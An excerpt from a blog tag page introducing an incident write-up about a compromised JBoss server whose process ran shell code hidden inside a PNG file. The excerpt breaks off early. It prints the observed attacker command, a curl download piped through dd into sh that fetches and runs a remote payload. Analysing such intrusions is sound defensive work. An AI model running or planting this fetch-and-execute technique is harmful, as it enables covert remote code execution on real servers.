Posts Tagged ‘jboss’

Covert channels: Hiding shell scripts in PNG files

A colleague made me aware of a JBoss server having been compromised. Upon inspection, one of the processes run by the JBoss user account was this one: sh -c curl hxxp:// -k|dd skip=2446 bs=1|sh   This is a rather elegant way of disguising malicious code. If we first take a look at the png file: […]